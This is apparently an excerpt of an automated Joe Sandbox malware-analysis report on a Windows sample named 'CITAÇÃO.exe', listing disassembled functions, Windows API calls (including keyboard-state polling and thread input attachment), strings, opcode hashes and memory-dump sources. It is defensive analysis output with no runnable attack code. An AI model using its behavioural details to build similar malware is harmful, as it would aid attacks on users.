                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                      • String ID:
                                                      • API String ID: 3413494760-0
                                                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _strncmp
                                                      • String ID: '$DEFINE$\$`$h$h
                                                      • API String ID: 909875538-3708680428
                                                      • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                      • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                                                      • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                      • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                                      • String ID: AU3_FreeVar
                                                      • API String ID: 2634073740-771828931
                                                      • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                      • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 0046C63A
                                                      • CoUninitialize.OLE32 ref: 0046C645
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 2294789929-1287834457
                                                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                      APIs
                                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                      • ReleaseCapture.USER32 ref: 0047116F
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 2483343779-2107944366
                                                      • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                      • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                      • _wcslen.LIBCMT ref: 00450720
                                                      • _wcscat.LIBCMT ref: 00450733
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat_wcslen
                                                      • String ID: -----$SysListView32
                                                      • API String ID: 4008455318-3975388722
                                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                      • GetParent.USER32 ref: 00469C98
                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                      • GetParent.USER32 ref: 00469CBC
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 2360848162-1403004172
                                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                      • String ID:
                                                      • API String ID: 262282135-0
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      APIs
                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                      • String ID:
                                                      • API String ID: 3771399671-0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 0-1603158881
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00448603
                                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                      • IsMenu.USER32(?), ref: 004486AB
                                                      • CreatePopupMenu.USER32 ref: 004486B5
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                      • DrawMenuBar.USER32 ref: 004486F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0
                                                      • API String ID: 161812096-4108050209
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe), ref: 00434057
                                                      • LoadStringW.USER32(00000000), ref: 00434060
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                      • LoadStringW.USER32(00000000), ref: 00434078
                                                      • _wprintf.LIBCMT ref: 004340A1
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                      • C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, xrefs: 00434040
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 3648134473-3681433116
                                                      APIs
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                      • String ID:
                                                      • API String ID: 978794511-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: _memmove$_memcmp
                                                      • String ID: '$\$h
                                                      • API String ID: 2205784470-1303700344
                                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
• DestroyWindow.USER32(?), ref: 00426F50
• UnregisterHotKey.USER32(?), ref: 00426F77
• FreeLibrary.KERNEL32(?), ref: 0042701F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
